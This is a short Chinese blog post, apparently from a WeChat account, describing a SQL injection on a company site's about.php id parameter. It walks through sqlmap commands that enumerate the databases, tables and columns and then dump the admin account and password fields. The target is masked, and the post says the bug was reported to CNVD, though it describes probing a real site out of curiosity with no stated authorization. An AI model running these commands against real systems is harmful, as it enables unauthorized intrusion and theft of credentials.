前言
本次实战来源于谷歌搜索引擎。漏洞已经上报CNVD,全程会打码。
实战过程
1.打开网站的前台,此时页面是正常显示,在URL头中发现id值。
2.尝试加入单引号验证是否存在SQL注入漏洞。发现加入单引号后,页面发生了一些变化。
3.直接使用我们的SQL注入神器-SqlMap扫描一波数据库。成功扫描出来数据库。
SqlMap:
python sqlmap.py -u "http://XXXX.com/about.php?id=1"--delay 2 --batch –dbs
4.继续查看数据库XXX里面的所有表。
SqlMap:
python sqlmap.py -u "http://XXXX.com/about.php?id=1"--delay 2 --batch -D XXXX --tables
5.查看到了所有的表名,好奇心唆使我查看XXX表里的内容😜
SqlMap:
python sqlmap.py -u "http://XXXX.com/about.php?id=1"--delay 2 --batch -D XXXX -T XXXX –colum
6.都到这里了,必须查看里面到底有些啥。这里得到了网站管理员的账号密码😁
SqlMap:
python sqlmap.py -u "http://XXXX.com/about.php?id=1"--delay 2 --batch -D XXXX -T XXXX -C admin_name,admin_pass --dump
上报CNVD漏洞平台,溜了溜了。
更多文章请关注公众号:星河疯客admin
万水千山总是情,点赞再走行不行是o(* ̄▽ ̄*)o
原文始发于微信公众号(星河疯客admin):记某公司前台SQL注入漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论